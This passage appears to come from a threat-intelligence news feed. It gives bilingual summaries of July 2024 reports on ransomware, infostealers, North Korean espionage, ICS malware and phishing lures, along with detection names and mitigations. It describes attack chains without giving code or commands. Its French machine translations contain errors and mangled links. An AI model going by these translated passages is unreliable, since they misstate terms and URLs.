rejected the messages. The spammer spoofed the RFC822 “from” header but could not spoof the RFC821 envelope sender address. The spammer used a rotating series of leased virtual private servers (VPS) from several providers, using many different IP addresses to initiate quick bursts of thousands of messages at a time from their SMTP servers, sent to Microsoft 365 to be relayed to Proofpoint-hosted customer servers. Microsoft 365 accepted these spoofed messages and sent them to these customers\' email infrastructures to be relayed. When customer domains were spoofed while relaying through the matching customer\'s email infrastructure, DKIM signing was also applied as the messages transited through the Proofpoint infrastructure, making the spam messages more deliverable. As many of the tenants being abused by the spammer are still active as of writing, we have implemented several measures to prevent unauthorized relay through Proofpoint servers to keep our customers protected. Taking Action to Notify and Protect Our Customers Proofpoint quickly mobilized a cross-functional task force to identify and contact all customers that had an at-risk configuration to help them change their configuration settings, prioritizing those whose infrastructures we	Spam Threat Technical	Yahoo
	2024-07-26 21:04:13	Rhysida utilisant la porte dérobée Oyster pour fournir des ransomwares Rhysida using Oyster Backdoor to deliver ransomware (lien direct)	#### Industries ciblées - Éducation ## Instantané Le menace de malwarebytes a identifié une récente attaque du gang de ransomware Rhysida, qui a utilisé une nouvelle variante de la porte dérobée Oyster, également connue sous le nom deBroomstick. Lire Microsoft \'s [Profil d'outil sur Rhysida Ransomware] (https://security.microsoft.com/intel-Profils / 54FA2B350E8F22DA059F8463E93142A39C18A30C5BA1B9F3A4631A4979A9B507) pour plus d'informations. ## Description Il s'agit d'une version mise à jour de la campagne Oyster rapportée par [Rapid7] (https://www.rapid7.com/blog/post/2024/06/17/malvertinging-campaign-leads-to-execution-of-oyster-Backdoor /) qui a utilisé des résultats de recherche de SEO-poisson pour tromper les utilisateurs dans le téléchargement des installateurs malveillants, se faisant passer pour des logiciels légitimes tels que Google Chrome et Microsoft, pour abandonner la porte dérobée Oyster. Cette attaque de la campagne mise à jour a ciblé une éminente école privée et a impliqué le déploiement de la porte dérobée Oyster sur un point de terminaison client, provenant probablement d'un scanner IP malveillant distribué par malvertising.Les attaquants ont accédé aux périphériques de stockage (NAS) attachés au réseau et au logiciel de machine virtuelle (VM) utilisant des informations d'identification Shell Shell (SSH) volées pour contourner les mesures de sécurité et finalement déployer des ransomwares Rhysida, crypter des fichiers et des sauvegardes locales. ## Analyse supplémentaire Selon [Malpedia] (https://malpedia.caad.fkie.fraunhofer.de/details/win.broomstick), Oyster (également suivi comme Broomstick, CleanBoost et Cleanup), est un malware de backdoor qui a été observé pour la première fois au 2023.Cependant, les campagnes récentes ont vu le déploiement direct de la porte dérobée Oyster.En règle générale, Oyster est utilisé par les acteurs de la menace pour aider au déploiement des ransomwares car il peut collecter des données système, communiquer avec un serveur de commande et de contrôle et exécuter des fichiers supplémentaires. ## Détections / requêtes de chasse Microsoft Defender Antivirus Microsoft Defender Antivirus détecte les composants de la menace comme le malware suivant: - [Ransom: win64 / rhysida] (https://www.microsoft.com/en-us/wdsi/atheats/malware-encYClopedia-Description? Name = Ransom: win64 / rhysida.a! dha & menaceID = -2147114922 & ocid = magicti_ta_ency) ## Recommandations Microsoft RecOmence les atténuations suivantes pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - durcir les actifs orientés Internet et identifier et sécuriser les systèmes de périmètre que les attaquants pourraient utiliser pour accéder au réseau.Interfaces de numérisation publique, telles que [Microsoft Defender External Attack Surface Management] (https://www.microsoft.com/security/business/cloud-security/microsoft-defender-extern-attack-surface-management?ocid=Magicti_TA_ABBReviatedMkTgpage),,,,,,peut être utilisé pour augmenter les données.Le tableau de bord du résumé de la surface d'attaque fait face à des actifs, tels que les serveurs d'échange, qui nécessitent des mises à jour de sécurité et fournissent des étapes de remédiation recommandées. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-lock-at-first-sight-microsoft-defender-asvirus?ocid=magicti_ta_learndoc)Dans Microsoft Defender Antivirus ou l'équivalent pour que votre produit antivirus couvre des outils et techniques d'attaquant en évolution rapide.Les protections d'apprentissage automatique basées sur le cloud bloquent une majorité de variantes nouvelles et inconnues. - Exécuter [Détection et réponse de point de terminaison (EDR) en mode bloc] (https://learn.microsoft.com/micr	Ransomware Malware Tool Threat		★★★
	2024-07-26 20:46:44	ExelaSealer a livré "de la Russie avec amour" ExelaStealer Delivered "From Russia With Love" (lien direct)	## Instantané Le SANS Technology Institute Internet Storm Center a signalé une menace impliquant la livraison d'ExelaSealer, téléchargée à partir d'une adresse IP russe.L'attaque implique l'utilisation d'un script PowerShell pour télécharger un fichier à partir d'une source russe, qui tente de désactiver la protection antivirus ou incite la victime à le faire. ## Description Le script PowerShell télécharge deux fichiers PE, dont l'un est une archive RAR auto-extraite communiquant avec "Solararbx \ [. \] En ligne".L'autre fichier, "Service.exe", est l'Exelasealer, développé dans Python et en utilisant Discord comme canal de commande et de contrôle pour les activités de reconnaissance via un script, y compris la collecte d'informations système et les détails de l'utilisateur. Le script contient des commentaires en russe et leExelastealer serait également originaire de Russie.Le script PowerShell est simple et a un score VT faible de 8/65.À l'heure actuelle, le but des archives RAR est inconnu. ## Détections / requêtes de chasse Microsoft Defender Antivirus détecte les composants de la menace comme le malware suivant: - [Trojan: win32 / dcrat.mq! Mtb] (https://www.microsoft.com/en-us/wdssi/Therets/Malware-encyClopedia-description?name=trojan:win32/dcrat.mq!mtb) ## Les références [EXELASTEALER a livré "de la Russie avec amour"] (https://isc.sans.edu/diary/rss/31118).SANS TECHNOLOGY Institute Internet Storm Center (consulté en 2024-07-26) ## Droits d'auteur &copie;Microsoft 2024 .Tous droits réservés.La reproduction ou la distribution du contenu de ce site, ou de toute partie de celle-ci, sans l'autorisation écrite de Microsoft est interdite. ## Snapshot The SANS Technology Institute Internet Storm Center reported a threat involving the delivery of ExelaStealer, downloaded from a Russian IP address. The attack involves the use of a PowerShell script to download a file from a Russian source, which attempts to disable antivirus protection or prompts the victim to do so. ## Description The PowerShell script downloads two PE files, one of which is a self-extracting RAR archive communicating with "solararbx\[.\]online". The other file, "service.exe", is the ExelaStealer, developed in Python and using Discord as a command & control channel for reconnaissance activities via a script, including gathering system information and user details.The script contains comments in Russian, and the ExelaStealer is also believed to have originated from Russia. The PowerShell script is simple and has a low VT score of 8/65. At this time, the purpose of the RAR archive is unknown. ## Detections/Hunting Queries Microsoft Defender Antivirus detects threat components as the following malware: - [Trojan:Win32/DCRat.MQ!MTB](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/DCRat.MQ!MTB) ## References [ExelaStealer Delivered "From Russia With Love"](https://isc.sans.edu/diary/rss/31118). SANS Technology Institute Internet Storm Center (accessed 2024-07-26) ## Copyright © Microsoft 2024. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited.	Malware Threat		★★
	2024-07-26 19:24:17	(Déjà vu) Les attaques d'escroquerie profitent de la popularité de la vague de l'IA générative Scam Attacks Taking Advantage of the Popularity of the Generative AI Wave (lien direct)	## Instantané Les analystes de Palo Alto Networks ont constaté que les acteurs du cybermenace exploitent l'intérêt croissant pour l'intelligne artificiel génératif (Genai) pour mener des activités malveillantes. ## Description Palo Alto Networks \\ 'Analyse des domaines enregistrés avec des mots clés liés à Genai a révélé des informations sur les activités suspectes, y compris les modèles textuels et le volume du trafic.Des études de cas ont détaillé divers types d'attaques, tels que la livraison de programmes potentiellement indésirables (chiots), de distribution de spam et de stationnement monétisé. Les adversaires exploitent souvent des sujets de tendance en enregistrant des domaines avec des mots clés pertinents.Analyser des domaines nouvellement enregistrés (NRD) contenant des mots clés Genai comme "Chatgpt" et "Sora", Palo Alto Networks a détecté plus de 200 000 NRD quotidiens, avec environ 225 domaines liés au Genai enregistrés chaque jour depuis novembre 2022. Beaucoup de ces domaines, identifiés comme suspects, a augmenté d'enregistrement lors des principaux jalons de Chatgpt, tels que son intégration avec Bing et la sortie de GPT-4.Les domaines suspects représentaient un taux moyen de 28,75%, nettement supérieur au taux de NRD général.La plupart des trafics vers ces domaines étaient dirigés vers quelques acteurs majeurs, avec 35% de ce trafic identifié comme suspect. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - Encourager les utilisateurs à utiliser Microsoft Edge et d'autres navigateurs Web qui prennent en charge [SmartScreen] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-overview?ocid=Magicti_TA_LearnDDoc), qui identifieet bloque des sites Web malveillants, y compris des sites de phishing, des sites d'arnaque et des sites qui hébergent des logiciels malveillants. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-lock-at-first-Sight-Microsoft-Defender-Antivirus? Ocid = magicti_ta_learndoc) dans Microsoft Defender Antivirus, ou l'équivalentpour votre produit antivirus, pour couvrir les outils et techniques d'attaquant en évolution rapide.Les protections d'apprentissage automatique basées sur le cloud bloquent une majorité de variantes nouvelles et inconnues. - Appliquer le MFA sur tous les comptes, supprimer les utilisateurs exclus de MFA et strictement [nécessite MFA] (https: //Learn.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy?ocid=Magicti_TA_LearnDoc) à partir deTous les appareils, à tous les endroits, à tout moment. - Activer les méthodes d'authentification sans mot de passe (par exemple, Windows Hello, FIDO Keys ou Microsoft Authenticator) pour les comptes qui prennent en charge sans mot de passe.Pour les comptes qui nécessitent toujours des mots de passe, utilisez des applications Authenticatrices comme Microsoft Authenticator pour MFA.[Reportez-vous à cet article] (https://learn.microsoft.com/azure/active-directory/authentication/concept-authentication-methods?ocid=Magicti_ta_learndoc) pour les différentes méthodes et fonctionnalités d'authentification. - Pour MFA qui utilise des applications Authenticator, assurez-vous que l'application nécessite qu'un code soit tapé dans la mesure du possible, car de nombreuses intrusions où le MFA a été activé a toujours réussi en raison des utilisateurs qui cliquent sur «Oui» sur l'invite sur leurs téléphones même lorsqu'ils n'étaient pas àLeurs [appareils] (https://learn.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match?ocid=Magicti_TA_LearnDoc).Reportez-vous à [cet article] (https://learn.microsoft.com/azure/active-directory/authentication/concept-authentication-methods?ocid=Magicti_ta_learndoc) pour un	Ransomware Spam Malware Tool Threat Studies	ChatGPT	★★★
	2024-07-26 18:40:00	La Corée du Nord Cyber Group mène une campagne d'espionnage mondiale pour faire avancer les régimes des programmes militaires et nucléaires North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regimes Military and Nuclear Programs (lien direct)	## Instantané Plusieurs agences américaines et internationales ont identifié l'activité de cyber-espionnage associée aux démocrates \\République de Corée (DPRC) 3e Bureau du Bureau général de la reconnaissance (RVB), connu sous le nom d'Andariel. Microsoft suit cector as onyx greet. [En savoir plus à leur sujet ici.] (https://sip.security.microsoft.com/intel-profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0) ## Description Le groupe cible les entités de défense, aérospatiale, nucléaire et ingénierie pour obtenir des informations techniques sensibles et une propriété intellectuelle pour l'avancement des programmes militaires et nucléaires du régime.Ils financent leurs activités grâce à des opérations de ransomwares contre des entités de santé américaines. Andariel gagne un accès initial par l'exploitation des serveurs Web à l'aide de vulnérabilités connues, déploie des coquilles Web, mène des activités de phishing à l'aide de pièces jointes malveillantes et utilise la découverte de système standard, les techniques d'énumération et l'escalade des privilèges à l'aide d'outils comme Mimikatz.De plus, ils ont été observés à l'aide d'outils de dénombrement de système de fichiers personnalisés, de collecte de données de ruche de registre, de mise à profit de la journalisation du système pour la découverte, de déguisement des logiciels malveillants dans les paquets HTTP et à l'aide d'outils de tunneling pour les opérations de commande et de contrôle.Les acteurs de la menace ont également exfiltré des données aux services Web, au stockage cloud et aux serveurs contrôlés par la Corée du Nord à l'aide d'utilitaires comme Putty et WinSCP, et ont mis en scène des fichiers d'exfiltration sur les machines victimes. ## Détections / requêtes de chasse Microsoft Defender Antivirus Microsoft Defender Antivirus détecte les composants de la menace comme le malware suivant: - [Trojan: Win32 / Vinosiren] (https://www.microsoft.com/en-us/wdsi/Threats/Malware-Cycopedia-Description?name=trojan:win32/vinosiren.l!dha) - [Trojan: Win64 / Hazyload] (https://www.microsoft.com/en-us/wdsi/Threats/Malware-encyClopedia-Description?name=trojan:win64/hazyload.a!dha&Theatid=-2147074394) - [Trojan: win64 / dtrack.b! Dha] (https://www.microsoft.com/en-us/wdsi/atherets/malware-encycopedia-description?name=trojan:win64/dtrack.b!dha& threatId= -2147062589) Microsoft Defender pour le point final Les alertes avec le titre suivant dans le centre de sécurité peuvent indiquer une activité de menace sur votre réseau: - Groupe d'activités de grésil Onyx L'alerte suivante pourrait également indiquer une activité de menace associée à cette menace.Cette alerte, cependant, peut être déclenchée par une activité de menace non apparentée et ne sont pas surveillées dans les cartes d'état fournies avec ce rapport. - [Comportement: win32 / certutilpe.a] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-dercription?name=behavior:win32/OfficeExeccerTutil.a & menaceID = 2147781013 & ocid = magicti_ta_ency) ## Recommandations Microsoft recommande le suivantatténuations pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-lock-at-first-sight-microsoft-defender-asvirus?ocid=magicti_ta_learndoc)Dans Microsoft Defender Antivirus, ou l'équivalent de votre produit antivirus, pour couvrir les outils et techniques d'attaquant en évolution rapide.Les protections d'apprentissage automatique basées sur le cloud bloquent une majorité de variantes nouvelles et inconnues. - Activer [Protection réseau] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worl	Ransomware Malware Tool Vulnerability Threat Medical Cloud Technical		★★★
	2024-07-26 17:22:17	Les chercheurs mettent en garde contre l'augmentation de l'activité de cyberterrorisme ciblant les Jeux olympiques de Paris Researchers Warn of Increased Cyberterrorism Activity Targeting Paris Olympics (lien direct)	Le cyberterrorisme est en augmentation, constituant une menace importante pour les événements mondiaux comme les Jeux olympiques et les élections de Paris, & # 8230; Cyberterrorism is on the rise, posing a significant threat to global events like the Paris Olympics and elections,…	Threat		★★★
	2024-07-26 15:00:23	Voleur de flammes Flame Stealer (lien direct)	## Snapshot Analysts at Cyfirma have released a report on the widespread adoption of Flame Stealer, an [information stealer](https://security.microsoft.com/intel-profiles/byExternalId/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6) malware for sale on Discord and Telegram. ## Description Designed to steal Discord tokens, browser cookies, and credentials, this tool has been used by numerous threat actors employing various evasion techniques. Initially advertised as untraceable, Flame Stealer operates mainly on Discord, targeting sensitive data from platforms like Discord, Spotify, Instagram, TikTok, and Roblox. he malware is programmed in C/C++, employs DLL side-loading, and sends stolen data to specified webhooks. Flame Stealer achieves persistence by adding programs to startup folders and using code obfuscation techniques to evade detection. It also gathers extensive system information and can capture clipboard data and webcam footage. The Flame Stealer uses Discord webhooks for data exfiltration and has capabilities to shutdown or reboot the target machine. ## Microsoft Analysis In recent years, Microsoft has tracked the growing risk that infostealers pose to enterprise security. Infostealers are commodity malware used to steal information from a target device and send it to the threat actor. The popularity of this class of malware led to the emergence of an infostealer ecosystem and a new class of threat actors who leveraged these capabilities to conduct their attacks. Often, infostealers are advertised as a malware as a service (MaaS) offering – a business model where the developers lease the infostealer payload to distributers for a fee. Information stealers are versatile and can be distributed in various forms including through phishing email campaigns, malvertising, and trojanized software, games and tools. They can target a range of information like session tokens and cookies, saved passwords, financial information, and credentials for internet-facing systems and applications. Typically, once the user downloads and launches the malicious payload, it establishes command and control (C2) connections with suspicious domains. Once infected, the infostealer attempts to collect and ultimately exfiltrate information from the system including files, browsers, internet-facing devices and applications to the C2 servers. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations. - Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [safe attachments policies](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check attachments to inbound email. - Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware. - Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta	Ransomware Spam Malware Tool Threat		★★★
	2024-07-26 14:00:00	Les hacktivistes réclament la fuite de l'intelligence de la menace en crowdsstrike Hacktivists Claim Leak of CrowdStrike Threat Intelligence (lien direct)	CrowdStrike a reconnu les affirmations du groupe Hacktivist USDOD, qui a fourni un lien pour télécharger la liste des acteurs de menace présumée sur un forum de cybercriminalité CrowdStrike has acknowledged the claims by the USDoD hacktivist group, which has provided a link to download the alleged threat actor list on a cybercrime forum	Threat		★★★
	2024-07-26 11:57:23	Telegram for Android hit by a zero-day exploit – Week in security with Tony Anscombe (lien direct)	Les attaquants abusant de la vulnérabilité "Evilvideo" pourraient partager des charges utiles Android malveillantes via des canaux, des groupes et des chats télégrammes, tout en les faisant apparaître comme des fichiers multimédias légitimes Attackers abusing the "EvilVideo" vulnerability could share malicious Android payloads via Telegram channels, groups, and chats, all while making them appear as legitimate multimedia files	Vulnerability Threat Mobile		★★★
	2024-07-26 11:22:00	Crowdsstrike met en garde contre la nouvelle arnaque de phishing ciblant les clients allemands CrowdStrike Warns of New Phishing Scam Targeting German Customers (lien direct)	CrowdStrike alerte un acteur inconnu des menaces qui tente de capitaliser sur le fiasco de mise à jour du capteur Falcon pour distribuer des installateurs douteux ciblant les clients allemands dans le cadre d'une campagne très ciblée. La société de cybersécurité a déclaré avoir identifié ce qu'elle décrivait comme une tentative de phission de lance non attribuée le 24 juillet 2024, distribuant un journaliste de crash non authentique CrowdStrike is alerting about an unfamiliar threat actor attempting to capitalize on the Falcon Sensor update fiasco to distribute dubious installers targeting German customers as part of a highly targeted campaign. The cybersecurity company said it identified what it described as an unattributed spear-phishing attempt on July 24, 2024, distributing an inauthentic CrowdStrike Crash Reporter	Threat		★★★
	2024-07-26 10:28:35	Les gangs de ransomware russes représentent 69% de tous les bénéfices de la rançon Russian ransomware gangs account for 69% of all ransom proceeds (lien direct)	Les acteurs de la menace russe ont représenté au moins 69% de tous les produits de crypto liés à des ransomwares tout au long de l'année précédente, dépassant 500 000 000 $.[...] Russian-speaking threat actors accounted for at least 69% of all crypto proceeds linked to ransomware throughout the previous year, exceeding $500,000,000. [...]	Ransomware Threat		★★★★
	2024-07-26 10:02:00	Les pirates nord-coréens ciblent les infrastructures critiques pour le gain militaire North Korean Hackers Target Critical Infrastructure for Military Gain (lien direct)	Un avis conjoint du Royaume-Uni, des États-Unis et de la Corée du Sud a mis en garde contre une campagne d'espionnage mondiale par un acteur de menace de Corée du Nord, Andariel, ciblant les organisations CNI A joint advisory by the UK, US and South Korea have warned of a global espionage campaign by a North Korea threat actor, Andariel, targeting CNI organizations	Threat		★★★
	2024-07-26 01:34:07	MALWARE CREW Stargazers GOBLIN a utilisé 3 000 comptes GitHub pour faire de la banque Malware crew Stargazers Goblin used 3,000 GitHub accounts to make bank (lien direct)	peut même avoir ciblé d'autres gangs de logiciels malveillants, et les chercheurs de l'INFOSEC Les chercheurs Infosec ont découvert un réseau de plus de trois mille comptes de github malveillants utilisés pour répandre des logiciels malveillants, ciblant des groupes, y compris les joueurs, les chercheurs malveillants et même d'autresmenace les acteurs qui cherchent eux-mêmes à répandre les logiciels malveillants… May even have targeted other malware gangs, and infosec researchers Infosec researchers have discovered a network of over three thousand malicious GitHub accounts used to spread malware, targeting groups including gamers, malware researchers, and even other threat actors who themselves seek to spread malware.…	Malware Threat		★★
	2024-07-25 22:34:43	Méfiez-vous des faux domaines en crowdsstrike pompant Lumma infostoritration malware Beware of fake CrowdStrike domains pumping out Lumma infostealing malware (lien direct)	PSA: n'acceptez que les mises à jour via les canaux officiels ... ironiquement CrowdStrike est le dernier leurre utilisé pour inciter les utilisateurs de Windows à télécharger et à gérer le Notorious Lumma infostoritration malware, selon la boutique de sécurité \L'équipe Intel de menace, qui a repéré l'arnaque quelques jours seulement après le fiasco de mise à jour du capteur Falcon… PSA: Only accept updates via official channels ... ironically enough CrowdStrike is the latest lure being used to trick Windows users into downloading and running the notorious Lumma infostealing malware, according to the security shop\'s threat intel team, which spotted the scam just days after the Falcon sensor update fiasco.…	Malware Threat		★★★
	2024-07-25 20:14:43	FrostyGoop malware attack cut off heat in Ukraine during winter (lien direct)	## Instantané Le fournisseur de cybersécurité Dragos a identifié l'utilisation de FrostyGoop, un logiciel malveillant Windows lié aux groupes de menaces russes, dans une cyberattaque de janvier 2024 qui a perturbé le chauffage dans plus de 600 immeubles d'appartements à Lviv, en Ukraine.Le malware cible les systèmes de contrôle industriel (ICS) à l'aide du protocole Modbus TCP Communications. ## Description Les attaquants ont accédé initial au réseau de la victime près d'un an plus tôt en exploitant une vulnérabilité dans un routeur Mikrotik exposé à Internet.Ils ont maintenu l'accès à l'aide d'une volet en ligne, ont volé des informations d'identification des utilisateurs et ont finalement détourné les contrôleurs de systèmes de chauffage du district \\, rétrogradant leur firmware pour échapper à la détection. Parce que le réseau du fournisseur de victimes n'a pas été segmenté, les pirates ont pivoté pour compromettre le réseau interne et déployé le malware Frostygoop.FrostyGoop est des logiciels malveillants spécifiques aux ICS écrits dans Golang qui interagissent directement avec ICS à l'aide de Modbus TCP sur le port 502. Le malware a ensuite envoyé des commandes via le réseau Ethernet interne aux contrôleurs enco, que le fournisseur utilisait pour gérer les chaudières et les pompes de chauffage. Selon Dragos, l'incident est à noter car FrostyGoop est la première souche malveillante ICS axée sur l'abus du protocole Modbus, qui est l'un des protocoles ICS les plus populaires. ### Analyse supplémentaire Dragos n'a pas attribué l'attaque, mais d'autres chercheurs en cybersécurité rapportent que le TTPS correspond à l'activité de l'acteur de menace basé en Russie [Seashell Blizzard] (https://security.microsoft.com/intel-profiles/cf1e406a16835d56cf614430aea3962d7ed99f01eeeeeE3D9EE3048078288E5201BB) (aka Sandworm, APT44, Iridium).La Russie cible agressivement les infrastructures critiques ukrainiennes avec les deux CYberattaques et missiles.Par exemple, en avril, l'équipe d'intervention d'urgence informatique de l'Ukraine \\ (CER-UA) a indiqué que [Seashell Blizzard avait ciblé] (https://therecord.media/frostygoop-malware-ukraine-heat) près de 20 installations énergétiques dans les installations énergétiques de dansL'Ukraine au printemps, potentiellement pour amplifier l'impact des missiles russes intenses et des grèves de drones sur les infrastructures critiques. ## Recommandations Dragos recommande aux organisations de mettre en œuvre les 5 contrôles critiques SANS pour la cybersécurité OT de classe mondiale.Il s'agit notamment de la réponse aux incidents ICS, de l'architecture défendable, de la visibilité et de la surveillance du réseau ICS, de l'accès à distance sécurisé et de la gestion des vulnérabilités basée sur les risques.De plus, Dragos fournit les recommandations suivantes: 1. Réponse des incidents ICS Compte tenu de la complexité et de la nature ciblée de l'attaque de Frostygoop, un plan de réponse aux incidents robuste est crucial.Ce plan devrait intégrer des réponses spécialisées pour les environnements OT, car ces systèmes ont souvent des exigences de continuité opérationnelle qui remplacent les systèmes informatiques traditionnels.Pour FrostyGoop, qui interagit directement avec ICS via les commandes MODBUS, le plan de réponse doit inclure des procédures pour isoler rapidement les appareils affectés, analyser le trafic réseau pour les commandes MODBUS non autorisées et restaurer des opérations de système précises.La formation et les exercices réguliers spécifiques aux attaques MODBUS et ICS ciblées assureront également la préparation et la gestion efficace des incidents. 2. Architecture défendable Cette attaque met en évidence le manque de segmentation adéquate du réseau et la présence de contrôleurs exposés à Internet.Pour lutter contre les menaces comme FrostyGoop, une architecture défendable doit être mise en œuvre, en pri	Malware Vulnerability Threat Industrial		★★★
	2024-07-25 20:11:02	Nombre croissant de menaces tirant parti de l'IA Growing Number of Threats Leveraging AI (lien direct)	## Instantané Symantec a identifié une augmentation des cyberattaques utilisant des modèles de grande langue (LLM) pour générer du code malveillant pour télécharger diverses charges utiles. En savoir plus sur la façon dont Microsoft s'est associé à OpenAI pour [rester en avance sur les acteurs de la menace à l'ère de l'IA] (https://security.microsoft.com/intel-explorer/articles/ed40fbef). ## Description Les LLM, conçues pour comprendre et créer du texte de type humain, ont des applications, de l'assistance à l'écriture à l'automatisation du service client, mais peuvent également être exploitées à des fins malveillantes.Les campagnes récentes impliquent des e-mails de phishing avec du code pour télécharger des logiciels malveillants comme Rhadamanthys, Netsupport et Lokibot.Ces attaques utilisent généralement des scripts PowerShell générés par LLM livrés via des fichiers .lnk malveillants dans des fichiers zip protégés par mot de passe.Un exemple d'attaque impliquait un e-mail de financement urgent avec un tel fichier zip, contenant des scripts probablement générés par un LLM.Les recherches de Symantec \\ ont confirmé que les LLM comme Chatgpt peuvent facilement produire des scripts similaires.La chaîne d'attaque comprend l'accès initial via des e-mails de phishing, l'exécution des scripts générés par LLM et le téléchargement final de la charge utile.Symantec met en évidence la sophistication croissante des attaques facilitées par l'IA, soulignant la nécessité de capacités de détection avancées et de surveillance continue pour se protéger contre ces menaces en évolution. ## Analyse Microsoft Microsoft a identifié des acteurs comme [Forest Blizzard] (https://security.microsoft.com/Intel-Profiles / DD75F93B2A771C9510DCEEC817B9D34D868C2D1353D08C8C1647DE067270FDF8), [EMERDD Sleet] (HTTP EE4ED596D8AE16F942F442B895752AD9F41DD58E), [Crimson Sandstorm] (https://sip.security.microsoft.com/intel-profiles/34E4ACFE2868D450AC93C5C3E6D2DF021E2801BDB3700DD8F172D602DF6DA046), [CHARCOAL TYPHOON] ( 3DB3D52D0495410EFD39D506AAD9A4) et [Typhoon de saumon] (https://security.microsoft.com/intel-profiles/5323e9969bf361e48bc236a53189 6) Tirer parti des LLMautomatiseret optimiser la génération de scripts;Cependant, certains de ces acteurs ont exploité les LLM de d'autres manières, notamment la reconnaissance, la recherche sur la vulnérabilité, l'ingénierie sociale et la traduction des langues.En savoir plus sur la façon dont ces acteurs interagissent et utilisent les LLM sur le [Microsoft Security Blog] (https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of--of-Les acteurs de la menace à l'âge-ai /). ## Détections / requêtes de chasse Microsoft Defender Antivirus détecte les composants de la menace comme le malware suivant: - [* Trojan: Msil / Lazy ] (https: // www.Microsoft.com/en-us/wdsi/therets/malware-encyclopedia-dercription?name=trojan:mil/lazy.beaa!mtb) - [ Trojan: Win32 / Oyster ] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-dercription?name=trojan:win32/oyster!mtb) - [ Trojan: JS / Nemucod! MSR ] (https://www.microsoft.com/en-us/wdsi/atherets/Malware-encyClopedia-description?name=trojan:js/neMucod!msr) - [ Trojan: PowerShell / Malgent ] (https://www.microsoft.com/en-us/wdsi/Thereats/Malware-encycopedia-description?name=trojan:powershell/malgent!MSR) - [ Trojan: win32 / winlnk ] (https://www.microsoft.com/en-us/wdssi/Threats/Malware-encyClopedia-Description?name=trojan:win32/Winlnk.al) - [ Trojan: Win32 / Rhadamanthys ] (https://www.microsoft.com/en-us/wdsi/Therets/Malware-encyClopedia-description?name=trojan:win32/rhadamanthyslnk.da!Mtb) - [ Trojan: Win32 / Leonem ] (https://www.microsoft.com/en-us/wdsi/therets/malware-encycopedia-dercription?name=trojan:win32/leonem) - [ Trojan: js / obfuse.nbu ] (https://www.microsoft.com/en-us/wdsi/atherets/malware-encycopedia-description?name=trojan:js/obfuse.nbu) - [ Trojan: Win32 / Lokibot *] (https://www.mi	Malware Vulnerability Threat	ChatGPT	★★★
	2024-07-25 19:49:01	Les dangers cachés et les opportunités de l'IA génératrice: ce que les entreprises doivent savoir The Hidden Dangers and Opportunities of Generative AI: What Enterprises Need to Know (lien direct)	> Depuis le lancement de Chatgpt en novembre 2022, Generative IA (Genai) a connu une adoption rapide d'entreprise.Selon des chercheurs de The Netskope Threat Labs, en juin 2024, 96% des organisations utilisent divers types d'applications Genai.Cette adoption généralisée transforme le fonctionnement des entreprises, mais avec une grande puissance, une grande responsabilité - et [& # 8230;] >Since the launch of ChatGPT in November 2022, generative AI (genAI) has seen rapid enterprise adoption. According to researchers in the Netskope Threat Labs, as of June 2024, an astonishing 96% of organizations are using various types of genAI apps. This widespread adoption is transforming how businesses operate, but with great power comes great responsibility-and […]	Threat	ChatGPT	★★
	2024-07-25 19:38:00	Les pirates nord-coréens passent du cyber-espionnage aux attaques de ransomwares North Korean Hackers Shift from Cyber Espionage to Ransomware Attacks (lien direct)	Un acteur de menace en Corée du Nord, connu pour ses opérations de cyber-espionnage, s'est progressivement étendu à des attaques motivées financièrement qui impliquent le déploiement de ransomwares, le distinguant des autres groupes de piratage de l'État-nation liés au pays. Mandiant appartenant à Google suit le cluster d'activités sous un nouveau surnom APT45, qui chevauche des noms tels que Andariel, Nickel Hyatt, A North Korea-linked threat actor known for its cyber espionage operations has gradually expanded into financially-motivated attacks that involve the deployment of ransomware, setting it apart from other nation-state hacking groups linked to the country. Google-owned Mandiant is tracking the activity cluster under a new moniker APT45, which overlaps with names such as Andariel, Nickel Hyatt,	Ransomware Threat	APT 15	★★★
